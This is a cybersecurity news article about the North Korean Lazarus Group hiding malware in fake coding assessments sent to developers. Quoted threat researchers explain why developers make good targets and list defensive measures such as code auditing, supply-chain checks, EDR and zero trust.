North Korean hackers distributing malware through deceptive coding tests

Researchers have uncovered malicious software packages linked to the Lazarus Group, a North Korean hacking group. These malicious actors are posing as recruiters, using financial firm names to attract developers.

Understanding Lazarus Group’s tactics 

Callie Guenther, Senior Manager of Cyber Threat Research at Critical Start, explains, “The Lazarus Group’s scheme of using fake coding assessments to target developers indicates a shift in their strategies. This follows previous incidents like Operation Dream Job and In(ter)ception, where they utilized fake job offers and interviews to infect targets. Now, they are exploiting platforms like GitHub, PyPI, and npm to inject malicious code disguised in legitimate libraries such as pyperclip and pyrebase.”

Eric Schwake, Director of Cybersecurity Strategy at Salt Security, outlines key reasons why this approach is risky: 

• “Exploits developer trust: The attack capitalizes on developers’ natural inclination to showcase their skills. It manipulates the authentic process of code reviews and assessments, making detection challenging.
• Blends in with regular activity: Downloading and running code is a fundamental aspect of a developer’s workflow, complicating the identification of malicious activity among typical operations.
• Targets a critical asset: Developers often have privileged access to source code, sensitive data, and production environments. Compromising a developer can have severe downstream consequences.”

How security leaders can mitigate risks from Lazarus Group

Guenther provides the following suggestions for security professionals: 

1. “Awareness: Educate developers to authenticate coding tests and offers, particularly those with time limitations or unfamiliar software.
2. Supply chain security: Utilize tools like software composition analysis to validate open-source packages for integrity.
3. Code auditing: Routinely scrutinize third-party code and libraries for malicious components.
4. Endpoint protection: Enforce EDR to identify abnormal behavior linked to malware.
5. Zero trust: Implement a zero-trust model to restrict access if a developer’s system is compromised.” 

Schwake recommends: 

1. “Zero trust for all code: Treat all code, even from seemingly reliable sources, as potentially malicious until proven otherwise. Employ stringent code review and scanning procedures.
2. Secure your CI/CD pipelines: Fortify your development infrastructure with robust access controls, code signing, and artifact verification.
3. API security: APIs are essential for modern applications. Utilize a dedicated API security solution to identify, safeguard, and monitor your entire API landscape.
4. Security awareness training: Educate developers about the latest social engineering tactics and the risks associated with downloading and executing code from unknown sources.”